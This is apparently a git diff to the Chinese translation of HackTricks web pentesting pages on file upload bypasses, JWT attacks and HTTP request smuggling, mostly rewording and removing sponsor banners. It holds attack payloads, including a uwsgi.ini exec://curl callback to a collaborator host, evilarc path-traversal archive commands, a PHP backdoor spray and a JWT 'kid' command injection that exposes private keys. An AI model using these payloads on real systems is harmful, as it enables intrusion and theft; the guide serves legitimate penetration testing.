 
-**漏洞赏金提示**:**注册** **Intigriti**,一个由黑客为黑客创建的高级**漏洞赏金平台**!今天就加入我们,访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金!
-
-{% embed url="https://go.intigriti.com/hacktricks" %}
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/file-upload/README.md b/src/pentesting-web/file-upload/README.md
index d75588569..5979b7190 100644
--- a/src/pentesting-web/file-upload/README.md
+++ b/src/pentesting-web/file-upload/README.md
@@ -2,11 +2,6 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-

-
-如果你对**黑客职业**感兴趣并想要攻克不可攻克的目标 - **我们正在招聘!**(_需要流利的波兰语书写和口语能力_)。
-
-{% embed url="https://www.stmcyber.com/careers" %}
 
 ## 文件上传一般方法论
 
@@ -24,10 +19,10 @@
 ### 绕过文件扩展名检查
 
 1. 如果适用,**检查** **之前的扩展名**。也可以使用一些**大写字母**进行测试:_pHp, .pHP5, .PhAr ..._
-2. _检查**在执行扩展名之前添加有效扩展名**(也使用之前的扩展名):_
+2. _检查**在执行扩展名之前添加一个有效扩展名**(也使用之前的扩展名):_
 - _file.png.php_
 - _file.png.Php5_
-3. 尝试在末尾添加**特殊字符**。你可以使用Burp来**暴力破解**所有的**ascii**和**Unicode**字符。 (_注意你也可以尝试使用**之前**提到的**扩展名**_)
+3. 尝试在末尾添加**特殊字符**。可以使用Burp来**暴力破解**所有的**ascii**和**Unicode**字符。(_注意你也可以尝试使用**之前**提到的**扩展名**_)
 - _file.php%20_
 - _file.php%0a_
 - _file.php%00_
@@ -46,12 +41,12 @@
 - _file.php%0a.png_
 - _file.php%0d%0a.png_
 - _file.phpJunk123png_
-5. 为之前的检查添加**另一层扩展名**:
+5. 在之前的检查中添加**另一层扩展名**:
 - _file.png.jpg.php_
 - _file.php%00.png%00.jpg_
-6. 尝试将**exec扩展名放在有效扩展名之前**,并祈祷服务器配置错误。(有助于利用Apache配置错误,其中任何带有扩展名**_**.php**_**的内容,但不一定以.php结尾**将执行代码):
-- _例如:file.php.png_
-7. 在**Windows**中使用**NTFS备用数据流(ADS)**。在这种情况下,冒号字符“:”将插入在禁止扩展名之后和允许扩展名之前。因此,将在服务器上创建一个**带有禁止扩展名的空文件**(例如“file.asax:.jpg”)。该文件可以稍后使用其他技术进行编辑,例如使用其短文件名。“**::$data**”模式也可以用于创建非空文件。因此,在此模式后添加一个点字符也可能有助于绕过进一步的限制(例如“file.asp::$data.”)
+6. 尝试将**执行扩展名放在有效扩展名之前**,并祈祷服务器配置错误。(对利用Apache配置错误很有用,任何带有扩展名**_**.php**_**的内容,但不一定以.php**_**结尾的内容将执行代码):
+- _例如: file.php.png_
+7. 在**Windows**中使用**NTFS备用数据流(ADS)**。在这种情况下,冒号字符“:”将插入在禁止扩展名之后和允许扩展名之前。因此,将在服务器上创建一个**带有禁止扩展名的空文件**(例如“file.asax:.jpg”)。该文件可以使用其他技术进行编辑,例如使用其短文件名。“**::$data**”模式也可以用于创建非空文件。因此,在此模式后添加一个点字符也可能有助于绕过进一步的限制(例如“file.asp::$data.”)
 8. 尝试打破文件名限制。有效扩展名被截断,恶意PHP被保留。AAA<--SNIP-->AAA.php
 
 ```
@@ -67,18 +62,18 @@ AAA<--SNIP 232 A-->AAA.php.png
 
 ### 绕过内容类型、魔术数字、压缩和调整大小
 
-- 通过将**Content-Type** **header**的**值**设置为:_image/png_ , _text/plain , application/octet-stream_来绕过**Content-Type**检查。
-1. Content-Type **字典**:[https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt)
+- 通过将**Content-Type** **头**的**值**设置为:_image/png_ , _text/plain , application/octet-stream_来绕过**Content-Type**检查。
+1. Content-Type **字典**: [https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt)
 - 通过在文件开头添加**真实图像的字节**(混淆_file_命令)来绕过**魔术数字**检查。或者在**元数据**中引入shell:\
 `exiftool -Comment="' >> img.png`
-- 如果**压缩被添加到你的图像**,例如使用一些标准的PHP库如[PHP-GD](https://www.php.net/manual/fr/book.image.php),那么之前的技术将无效。然而,你可以使用**PLTE块** [**在这里定义的技术**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html)来插入一些文本,使其**在压缩中存活**。
-- [**Github上的代码**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_plte_png.php)
+- 如果**压缩被添加到你的图像中**,例如使用一些标准的PHP库如[PHP-GD](https://www.php.net/manual/fr/book.image.php),那么之前的技术将无效。然而,你可以使用**PLTE块** [**在这里定义的技术**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html)来插入一些文本,使其**在压缩中存活**。
+- [**带有代码的Github**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_plte_png.php)
 - 网页也可能在**调整图像大小**,例如使用PHP-GD函数`imagecopyresized`或`imagecopyresampled`。然而,你可以使用**IDAT块** [**在这里定义的技术**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html)来插入一些文本,使其**在压缩中存活**。
-- [**Github上的代码**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_idat_png.php)
+- [**带有代码的Github**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_idat_png.php)
 - 另一种制作**在图像调整大小中存活的有效载荷**的技术,使用PHP-GD函数`thumbnailImage`。然而,你可以使用**tEXt块** [**在这里定义的技术**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html)来插入一些文本,使其**在压缩中存活**。
-- [**Github上的代码**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_tEXt_png.php)
+- [**带有代码的Github**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_tEXt_png.php)
 
 ### 其他检查技巧
 
@@ -98,13 +93,13 @@ AAA<--SNIP 232 A-->AAA.php.png
 如果你尝试将文件上传到**PHP服务器**, [查看**.htaccess**技巧以执行代码](https://book.hacktricks.xyz/pentesting/pentesting-web/php-tricks-esp#code-execution-via-httaccess)。\
 如果你尝试将文件上传到**ASP服务器**, [查看**.config**技巧以执行代码](../../network-services-pentesting/pentesting-web/iis-internet-information-services.md#execute-config-files)。
 
-`.phar`文件类似于Java的`.jar`,但用于PHP,可以**像PHP文件一样使用**(通过PHP执行或在脚本中包含它...)
+`.phar`文件类似于Java的`.jar`,但用于PHP,可以**像PHP文件一样使用**(用PHP执行或在脚本中包含它...)
 
 `.inc`扩展名有时用于仅用于**导入文件**的PHP文件,因此,在某些时候,可能有人允许**此扩展名被执行**。
 
 ## **Jetty RCE**
 
-如果你可以将XML文件上传到Jetty服务器,你可以获得[RCE,因为**新的\*.xml和\*.war会被自动处理**](https://twitter.com/ptswarm/status/1555184661751648256/photo/1)**。**因此,如下图所示,将XML文件上传到`$JETTY_BASE/webapps/`并期待shell!
+如果你可以将XML文件上传到Jetty服务器,你可以获得[RCE,因为**新的\*.xml和\*.war会被自动处理**](https://twitter.com/ptswarm/status/1555184661751648256/photo/1)**。** 所以,如下图所示,将XML文件上传到`$JETTY_BASE/webapps/`并期待shell!
 
 ![https://twitter.com/ptswarm/status/1555184661751648256/photo/1](<../../images/image (1047).png>)
 
@@ -112,7 +107,7 @@ AAA<--SNIP 232 A-->AAA.php.png
 
 有关此漏洞的详细探索,请查看原始研究:[uWSGI RCE利用](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html)。
 
-如果能够修改`.ini`配置文件,则可以在uWSGI服务器中利用远程命令执行(RCE)漏洞。uWSGI配置文件利用特定语法来包含“魔术”变量、占位符和操作符。值得注意的是,`@`操作符,作为`@(filename)`使用,旨在包含文件的内容。在uWSGI支持的各种方案中,“exec”方案特别强大,允许从进程的标准输出读取数据。当处理`.ini`配置文件时,可以利用此功能进行恶意目的,例如远程命令执行或任意文件写入/读取。
+如果能够修改`.ini`配置文件,则可以在uWSGI服务器中利用远程命令执行(RCE)漏洞。uWSGI配置文件利用特定语法来包含“魔术”变量、占位符和操作符。特别是,`@`操作符,用作`@(filename)`,旨在包含文件的内容。在uWSGI支持的各种方案中,“exec”方案特别强大,允许从进程的标准输出读取数据。当处理`.ini`配置文件时,可以利用此功能进行恶意目的,例如远程命令执行或任意文件写入/读取。 
 
 考虑以下有害的`uwsgi.ini`文件示例,展示各种方案:
 ```ini
@@ -132,13 +127,13 @@ extra = @(exec://curl http://collaborator-unique-host.oastify.com)
 ; call a function returning a char *
 characters = @(call://uwsgi_func)
 ```
-有效负载的执行发生在配置文件解析期间。为了激活和解析配置,uWSGI 进程必须被重启(可能是在崩溃后或由于拒绝服务攻击)或文件必须设置为自动重载。如果启用了自动重载功能,在检测到更改时,会在指定的时间间隔内重新加载文件。
+有效负载的执行发生在配置文件解析期间。为了激活和解析配置,uWSGI 进程必须被重启(可能是在崩溃后或由于拒绝服务攻击)或文件必须设置为自动重载。如果启用了自动重载功能,在检测到更改时会在指定的时间间隔内重新加载文件。
 
 理解 uWSGI 配置文件解析的宽松性质至关重要。具体来说,讨论的有效负载可以插入到二进制文件中(例如图像或 PDF),进一步扩大潜在利用的范围。
 
 ## **wget 文件上传/SSRF 技巧**
 
-在某些情况下,您可能会发现服务器使用 **`wget`** 来 **下载文件**,并且您可以 **指示** **URL**。在这些情况下,代码可能会检查下载文件的扩展名是否在白名单中,以确保仅下载允许的文件。然而,**此检查可以被绕过。**\
+在某些情况下,您可能会发现服务器正在使用 **`wget`** 来 **下载文件**,并且您可以 **指示** **URL**。在这些情况下,代码可能会检查下载文件的扩展名是否在白名单中,以确保仅下载允许的文件。然而,**此检查可以被绕过。**\
 **linux** 中 **文件名** 的 **最大** 长度为 **255**,但是 **wget** 将文件名截断为 **236** 个字符。您可以 **下载一个名为 "A"\*232+".php"+".gif"** 的文件,这个文件名将 **绕过** **检查**(因为在这个例子中 **".gif"** 是一个 **有效** 扩展名),但 `wget` 将 **重命名** 文件为 **"A"\*232+".php"**。
 ```bash
 #Create file and HTTP server
@@ -162,7 +157,7 @@ AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 100%[=============================================
 
 2020-06-13 03:14:06 (1.96 MB/s) - ‘AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php’ saved [10/10]
 ```
-注意,您可能正在考虑的**另一个选项**是使**HTTP服务器重定向到另一个文件**,因此初始URL将绕过检查,然后wget将下载重定向的文件并使用新名称。这**不会工作**,**除非**wget与**参数**`--trust-server-names`一起使用,因为**wget将下载重定向页面,并使用原始URL中指示的文件名称**。
+注意,您可能正在考虑的**另一个选项**是使**HTTP服务器重定向到另一个文件**,这样初始URL将绕过检查,然后wget将下载重定向的文件并使用新名称。除非使用**参数**`--trust-server-names`,否则**这将不起作用**,因为**wget将下载重定向页面,并使用原始URL中指示的文件名**。
 
 ## 工具
 
@@ -224,7 +219,7 @@ tar -cvf test.tar symindex.txt
 ```
 ### 在不同文件夹中解压
 
-在解压过程中意外创建文件在目录中是一个重大问题。尽管最初假设这种设置可能会防止通过恶意文件上传进行操作系统级命令执行,但ZIP归档格式的层次压缩支持和目录遍历能力可以被利用。这使得攻击者能够绕过限制,通过操纵目标应用程序的解压功能逃离安全上传目录。
+在解压过程中意外创建文件的情况是一个重大问题。尽管最初假设这种设置可能会防止通过恶意文件上传进行操作系统级命令执行,但ZIP归档格式的层次压缩支持和目录遍历能力可以被利用。这使得攻击者能够绕过限制,通过操纵目标应用程序的解压功能逃离安全上传目录。
 
 一个自动化的利用工具可以在 [**evilarc on GitHub**](https://github.com/ptoomey3/evilarc) 找到。该工具的使用方法如下:
 ```python
@@ -233,7 +228,7 @@ python2 evilarc.py -h
 # Creating a malicious archive
 python2 evilarc.py -o unix -d 5 -p /var/www/html/ rev.php
 ```
-此外,**使用 evilarc 的符号链接技巧**是一个选项。如果目标是针对像 `/flag.txt` 这样的文件,则应在您的系统中创建指向该文件的符号链接。这确保了 evilarc 在操作过程中不会遇到错误。
+此外,**使用 evilarc 的符号链接技巧**是一个选项。如果目标是针对像 `/flag.txt` 这样的文件,则应在您的系统中创建指向该文件的符号链接。这确保了 evilarc 在其操作过程中不会遇到错误。
 
 下面是用于创建恶意 zip 文件的 Python 代码示例:
 ```python
@@ -255,9 +250,9 @@ create_zip()
 ```
 **利用压缩进行文件喷洒**
 
-有关更多详细信息,请**查看原始帖子**: [https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/](https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/)
+有关更多详细信息,请**查看原始帖子**: [https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/](https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/)
 
-1.  **创建 PHP Shell**: PHP 代码被编写以执行通过 `$_REQUEST` 变量传递的命令。
+1.  **创建 PHP Shell**:编写 PHP 代码以执行通过 `$_REQUEST` 变量传递的命令。
 
 ```php
 
 ```
 
-2.  **文件喷洒和压缩文件创建**: 创建多个文件,并组装一个包含这些文件的 zip 存档。
+2.  **文件喷洒和压缩文件创建**:创建多个文件,并组装一个包含这些文件的 zip 存档。
 
 ```bash
 root@s2crew:/tmp# for i in `seq 1 10`;do FILE=$FILE"xxA"; cp simple-backdoor.php $FILE"cmd.php";done
 root@s2crew:/tmp# zip cmd.zip xx*.php
 ```
 
-3.  **使用十六进制编辑器或 vi 进行修改**: 使用 vi 或十六进制编辑器更改 zip 内部文件的名称,将 "xxA" 更改为 "../" 以遍历目录。
+3.  **使用十六进制编辑器或 vi 进行修改**:使用 vi 或十六进制编辑器更改 zip 内部文件的名称,将 "xxA" 更改为 "../" 以遍历目录。
 
 ```bash
 :set modifiable
@@ -284,7 +279,7 @@ root@s2crew:/tmp# zip cmd.zip xx*.php
 
 ## ImageTragic
 
-将此内容与图像扩展名一起上传以利用该漏洞 **(ImageMagick , 7.0.1-1)** (来自 [exploit](https://www.exploit-db.com/exploits/39767))
+将此内容与图像扩展名一起上传以利用该漏洞 **(ImageMagick , 7.0.1-1)** (来自 [exploit](https://www.exploit-db.com/exploits/39767))
 ```
 push graphic-context
 viewbox 0 0 640 480
@@ -301,7 +296,7 @@ pop graphic-context
 
 ## 多语言文件
 
-多语言文件在网络安全中作为一种独特工具,像变色龙一样可以同时有效地存在于多种文件格式中。一个有趣的例子是[GIFAR](https://en.wikipedia.org/wiki/Gifar),它既可以作为GIF也可以作为RAR档案。这样的文件并不限于这种配对;像GIF和JS或PPT和JS的组合也是可行的。
+多语言文件在网络安全中作为一种独特工具,像变色龙一样可以同时有效存在于多种文件格式中。一个有趣的例子是[GIFAR](https://en.wikipedia.org/wiki/Gifar),它既可以作为GIF也可以作为RAR档案。这样的文件并不限于这种配对;像GIF和JS或PPT和JS的组合也是可行的。
 
 多语言文件的核心实用性在于它们能够绕过基于类型的安全措施。各种应用中的常见做法是仅允许某些文件类型上传——如JPEG、GIF或DOC——以降低潜在有害格式(例如JS、PHP或Phar文件)带来的风险。然而,多语言文件通过符合多种文件类型的结构标准,可以悄然绕过这些限制。
 
@@ -318,10 +313,5 @@ pop graphic-context
 - [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
 - [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
 
-

-
-如果你对**黑客职业**感兴趣并想要攻克不可攻克的目标 - **我们正在招聘!** (_要求流利的波兰语书写和口语能力_).
-
-{% embed url="https://www.stmcyber.com/careers" %}
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/hacking-jwt-json-web-tokens.md b/src/pentesting-web/hacking-jwt-json-web-tokens.md
index a58661bc8..9ec0299c1 100644
--- a/src/pentesting-web/hacking-jwt-json-web-tokens.md
+++ b/src/pentesting-web/hacking-jwt-json-web-tokens.md
@@ -2,14 +2,8 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-

-
-如果你对 **黑客职业** 感兴趣并想要攻克不可攻克的目标 - **我们正在招聘!** (_需要流利的波兰语书写和口语能力_).
-
-{% embed url="https://www.stmcyber.com/careers" %}
-
-**本帖部分内容基于以下精彩文章:** [**https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology**](https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology)\
-**伟大工具的作者,用于对 JWT 进行渗透测试** [**https://github.com/ticarpi/jwt_tool**](https://github.com/ticarpi/jwt_tool)
+**本帖部分内容基于以下精彩文章:** [**https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology**](https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology)\
+**JWT 渗透测试的优秀工具作者** [**https://github.com/ticarpi/jwt_tool**](https://github.com/ticarpi/jwt_tool)
 
 ### **快速胜利**
 
@@ -38,7 +32,7 @@ python3 jwt_tool.py -Q "jwttool_706649b802c9f5e41052062a3787b291"
 要检查 JWT 的签名是否被验证:
 
 - 错误消息表明正在进行验证;应检查详细错误中的敏感信息。
-- 返回页面的变化也表明正在进行验证。
+- 返回页面的变化也表明正在验证。
 - 没有变化表明没有验证;这时可以尝试篡改有效负载声明。
 
 ### 来源
@@ -125,7 +119,7 @@ python3 jwt_tool.py  -I -hc kid -hv "../../dev/null" -S hs256 -p ""
 
 #### 通过“kid”的OS注入
 
-`kid`参数指定的文件路径在命令执行上下文中使用的场景可能导致远程代码执行(RCE)漏洞。通过向`kid`参数注入命令,可以暴露私钥。实现RCE和密钥暴露的示例有效载荷是:
+`kid`参数指定在命令执行上下文中使用的文件路径的场景可能导致远程代码执行(RCE)漏洞。通过向`kid`参数注入命令,可以暴露私钥。一个实现RCE和密钥暴露的示例有效载荷是:
 
 `/root/res/keys/secret7.key; cd /root/res/keys/ && python -m SimpleHTTPServer 1337&`
 
@@ -142,9 +136,9 @@ openssl genrsa -out keypair.pem 2048
 openssl rsa -in keypair.pem -pubout -out publickey.crt
 openssl pkcs8 -topk8 -inform PEM -outform PEM -nocrypt -in keypair.pem -out pkcs8.key
 ```
-然后您可以使用例如 [**jwt.io**](https://jwt.io) 来创建新的 JWT,使用 **创建的公钥和私钥,并将参数 jku 指向创建的证书。** 为了创建有效的 jku 证书,您可以下载原始证书并更改所需的参数。
+然后你可以使用例如 [**jwt.io**](https://jwt.io) 来创建新的 JWT,**使用创建的公钥和私钥,并将参数 jku 指向创建的证书。** 为了创建有效的 jku 证书,你可以下载原始证书并更改所需的参数。
 
-您可以使用以下方法从公钥证书中获取参数 "e" 和 "n":
+你可以使用以下方法从公钥证书中获取参数 "e" 和 "n":
 ```bash
 from Crypto.PublicKey import RSA
 fp = open("publickey.crt", "r")
@@ -157,7 +151,7 @@ print("e:", hex(key.e))
 
 X.509 URL。指向一组以 PEM 格式编码的 X.509(证书格式标准)公共证书的 URI。该组中的第一个证书必须是用于签署此 JWT 的证书。后续证书每个都签署前一个证书,从而完成证书链。X.509 在 RFC 52807 中定义。传输安全性是传输证书所必需的。
 
-尝试**将此头部更改为您控制下的 URL**,并检查是否收到任何请求。在这种情况下,您**可以篡改 JWT**。
+尝试**将此头部更改为您控制下的 URL**,并检查是否收到任何请求。在这种情况下,您**可能会篡改 JWT**。
 
 要使用您控制的证书伪造新令牌,您需要创建证书并提取公钥和私钥:
 ```bash
@@ -183,7 +177,7 @@ openssl x509 -in attacker.crt -text
 ```
 ### 嵌入式公钥 (CVE-2018-0114)
 
-如果JWT嵌入了公钥,如下场景所示:
+如果JWT嵌入了公钥,如以下场景所示:
 
 ![](<../images/image (624).png>)
 
@@ -203,7 +197,7 @@ openssl genrsa -out keypair.pem 2048
 openssl rsa -in keypair.pem -pubout -out publickey.crt
 openssl pkcs8 -topk8 -inform PEM -outform PEM -nocrypt -in keypair.pem -out pkcs8.key
 ```
-您可以使用此 nodejs 脚本获取 "n" 和 "e":
+您可以使用此 nodejs 脚本获取 "n" 和 "e":
 ```bash
 const NodeRSA = require('node-rsa');
 const fs = require('fs');
@@ -219,12 +213,12 @@ console.log('Parameter e: ', publicComponents.e.toString(16));
 
 如果某些应用程序使用 ES256 并使用相同的随机数生成两个 JWT,则可以恢复私钥。
 
-这是一个例子:[ECDSA:如果使用相同的随机数则泄露私钥(使用 SECP256k1)](https://asecuritysite.com/encryption/ecd5)
+这是一个例子:[ECDSA:如果使用相同的随机数泄露私钥(使用 SECP256k1)](https://asecuritysite.com/encryption/ecd5)
 
 ### JTI (JWT ID)
 
 JTI (JWT ID) 声明为 JWT 令牌提供了唯一标识符。它可以用于防止令牌被重放。\
-然而,想象一下 ID 的最大长度为 4(0001-9999)。请求 0001 和 10001 将使用相同的 ID。因此,如果后端在每个请求中递增 ID,您可以利用这一点来 **重放请求**(需要在每次成功重放之间发送 10000 个请求)。
+然而,想象一下一个情况,其中 ID 的最大长度为 4(0001-9999)。请求 0001 和 10001 将使用相同的 ID。因此,如果后端在每个请求中递增 ID,您可以利用这一点来 **重放请求**(需要在每次成功重放之间发送 10000 个请求)。
 
 ### JWT 注册声明
 
@@ -236,11 +230,11 @@ JTI (JWT ID) 声明为 JWT 令牌提供了唯一标识符。它可以用于防
 
 已经观察到一些 Web 应用程序依赖于受信任的 JWT 服务来生成和管理其令牌。记录到的实例表明,由 JWT 服务为一个客户端生成的令牌被同一 JWT 服务的另一个客户端接受。如果通过第三方服务观察到 JWT 的发行或续订,则应调查使用相同的用户名/电子邮件在该服务的另一个客户端上注册帐户的可能性。然后应尝试在请求中重放获得的令牌,以查看是否被接受。
 
-- 您的令牌被接受可能表明存在一个关键问题,这可能允许伪造任何用户的帐户。然而,需要注意的是,如果在第三方应用程序上注册,则可能需要更广泛测试的权限,因为这可能进入法律灰色地带。
+- 您的令牌被接受可能表明存在一个关键问题,这可能允许伪造任何用户的帐户。然而,需要注意的是,如果在第三方应用程序上注册,可能需要更广泛测试的权限,因为这可能进入法律灰色地带。
 
 **令牌的过期检查**
 
-使用 "exp" 负载声明检查令牌的过期。鉴于 JWT 通常在没有会话信息的情况下使用,因此需要谨慎处理。在许多情况下,捕获并重放另一个用户的 JWT 可能会使您能够冒充该用户。JWT RFC 建议通过利用 "exp" 声明为令牌设置过期时间来减轻 JWT 重放攻击。此外,应用程序实施相关检查以确保处理此值并拒绝过期令牌至关重要。如果令牌包含 "exp" 声明并且测试时间限制允许,建议在过期时间过后存储令牌并重放。可以使用 jwt_tool 的 -R 标志读取令牌的内容,包括时间戳解析和过期检查(UTC 中的时间戳)。
+使用 "exp" 负载声明检查令牌的过期。鉴于 JWT 通常在没有会话信息的情况下使用,因此需要谨慎处理。在许多情况下,捕获并重放另一个用户的 JWT 可能会使您能够冒充该用户。JWT RFC 建议通过利用 "exp" 声明为令牌设置过期时间来减轻 JWT 重放攻击。此外,应用程序实施相关检查以确保处理此值并拒绝过期令牌至关重要。如果令牌包含 "exp" 声明,并且测试时间限制允许,建议存储令牌并在过期时间过去后重放它。令牌的内容,包括时间戳解析和过期检查(UTC 中的时间戳),可以使用 jwt_tool 的 -R 标志读取。
 
 - 如果应用程序仍然验证令牌,则可能存在安全风险,因为这可能意味着令牌永远不会过期。
 
@@ -248,10 +242,5 @@ JTI (JWT ID) 声明为 JWT 令牌提供了唯一标识符。它可以用于防
 
 {% embed url="https://github.com/ticarpi/jwt_tool" %}
 
-

-
-如果您对 **黑客职业** 感兴趣并想要攻克不可攻克的目标 - **我们正在招聘!** (_需要流利的波兰语书面和口语能力_)。
-
-{% embed url="https://www.stmcyber.com/careers" %}
 
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/http-request-smuggling/README.md b/src/pentesting-web/http-request-smuggling/README.md
index 99ea1cf99..8f8de31de 100644
--- a/src/pentesting-web/http-request-smuggling/README.md
+++ b/src/pentesting-web/http-request-smuggling/README.md
@@ -2,17 +2,9 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-

-
-**从黑客的角度审视您的网络应用、网络和云**
-
-**发现并报告具有实际业务影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面,查找允许您提升权限的安全问题,并使用自动化利用收集重要证据,将您的辛勤工作转化为有说服力的报告。
-
-{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
-
 ## 什么是
 
-当**前端代理**与**后端**服务器之间发生**不同步**时,允许**攻击者**发送一个HTTP **请求**,该请求将被**前端**代理(负载均衡/反向代理)解释为**单个请求**,而被**后端**服务器解释为**两个请求**。\
+当**前端代理**与**后端**服务器之间发生**不同步**时,允许**攻击者**发送一个HTTP **请求**,该请求将被**前端**代理(负载均衡/反向代理)视为**单个请求**,而被**后端**服务器视为**两个请求**。\
 这使得用户能够**修改到达后端服务器的下一个请求**。
 
 ### 理论
@@ -23,7 +15,7 @@
 
 **Content-Length**
 
-> Content-Length 实体头指示发送给接收方的实体主体的大小(以字节为单位)。
+> Content-Length 实体头指示发送给接收方的实体主体的字节大小。
 
 **Transfer-Encoding: chunked**
 
@@ -33,20 +25,20 @@
 ### 现实
 
 **前端**(负载均衡/反向代理)**处理** _**content-length**_ 或 _**transfer-encoding**_ 头,而**后端**服务器**处理另一个**,导致两个系统之间发生**不同步**。\
-这可能非常关键,因为**攻击者将能够向反向代理发送一个请求**,该请求将被**后端**服务器**解释为两个不同的请求**。这种技术的**危险**在于**后端**服务器**将解释**为**第二个注入请求**,就好像它**来自下一个客户端**,而该客户端的**真实请求**将是**注入请求**的一部分。
+这可能非常关键,因为**攻击者将能够向反向代理发送一个请求**,该请求将被**后端**服务器**视为两个不同的请求**。这种技术的**危险**在于**后端**服务器**将解释**注入的**第二个请求**,仿佛它**来自下一个客户端**,而该客户端的**真实请求**将是**注入请求**的一部分。
 
 ### 特点
 
-请记住,在HTTP中**换行符由2个字节组成:**
+请记住,在HTTP中**一个新行字符由2个字节组成:**
 
-- **Content-Length**:此头使用**十进制数字**指示请求**主体**的**字节数**。主体预计在最后一个字符结束,**请求末尾不需要换行符**。
-- **Transfer-Encoding:** 此头在**主体**中使用**十六进制数字**指示**下一个块**的**字节数**。**块**必须以**换行符**结束,但此换行符**不计入**长度指示符。此传输方法必须以**大小为0的块后跟2个换行符**结束:`0`
+- **Content-Length**:此头使用**十进制数字**指示请求**主体**的**字节数**。主体预计在最后一个字符结束,**请求末尾不需要新行**。
+- **Transfer-Encoding:** 此头在**主体**中使用**十六进制数字**指示**下一个块**的**字节数**。**块**必须以**新行**结束,但此新行**不计入**长度指示符。此传输方法必须以**大小为0的块后跟2个新行**结束:`0`
 - **Connection**:根据我的经验,建议在请求走私的第一个请求中使用**`Connection: keep-alive`**。
 
 ## 基本示例
 
 > [!TIP]
-> 在尝试使用Burp Suite利用此漏洞时,**禁用 `Update Content-Length` 和 `Normalize HTTP/1 line endings`**,因为某些工具滥用换行符、回车和格式错误的内容长度。
+> 在尝试使用Burp Suite进行利用时,**禁用 `Update Content-Length` 和 `Normalize HTTP/1 line endings`**,因为某些工具滥用新行、回车和格式错误的内容长度。
 
 HTTP请求走私攻击是通过发送模棱两可的请求来构造的,这些请求利用了前端和后端服务器在解释`Content-Length`(CL)和`Transfer-Encoding`(TE)头时的差异。这些攻击可以以不同形式表现,主要为**CL.TE**、**TE.CL**和**TE.TE**。每种类型代表前端和后端服务器如何优先处理这些头的独特组合。漏洞源于服务器以不同方式处理相同请求,导致意外和潜在的恶意结果。
 
@@ -59,13 +51,13 @@ HTTP请求走私攻击是通过发送模棱两可的请求来构造的,这些
 
 #### CL.TE 漏洞(前端使用Content-Length,后端使用Transfer-Encoding)
 
-- **前端 (CL)**:根据`Content-Length`头处理请求。
-- **后端 (TE)**:根据`Transfer-Encoding`头处理请求。
+- **前端 (CL):** 根据`Content-Length`头处理请求。
+- **后端 (TE):** 根据`Transfer-Encoding`头处理请求。
 - **攻击场景:**
 
 - 攻击者发送一个请求,其中`Content-Length`头的值与实际内容长度不匹配。
 - 前端服务器根据`Content-Length`值将整个请求转发给后端。
-- 后端服务器由于`Transfer-Encoding: chunked`头将请求处理为分块,解释剩余数据为一个单独的后续请求。
+- 后端服务器由于`Transfer-Encoding: chunked`头将请求视为分块处理,解释剩余数据为一个单独的后续请求。
 - **示例:**
 
 ```
@@ -83,13 +75,13 @@ Foo: x
 
 #### TE.CL 漏洞(前端使用Transfer-Encoding,后端使用Content-Length)
 
-- **前端 (TE)**:根据`Transfer-Encoding`头处理请求。
-- **后端 (CL)**:根据`Content-Length`头处理请求。
+- **前端 (TE):** 根据`Transfer-Encoding`头处理请求。
+- **后端 (CL):** 根据`Content-Length`头处理请求。
 - **攻击场景:**
 
 - 攻击者发送一个分块请求,其中块大小(`7b`)和实际内容长度(`Content-Length: 4`)不一致。
 - 前端服务器遵循`Transfer-Encoding`,将整个请求转发给后端。
-- 后端服务器尊重`Content-Length`,仅处理请求的初始部分(`7b`字节),将其余部分留作意外的后续请求的一部分。
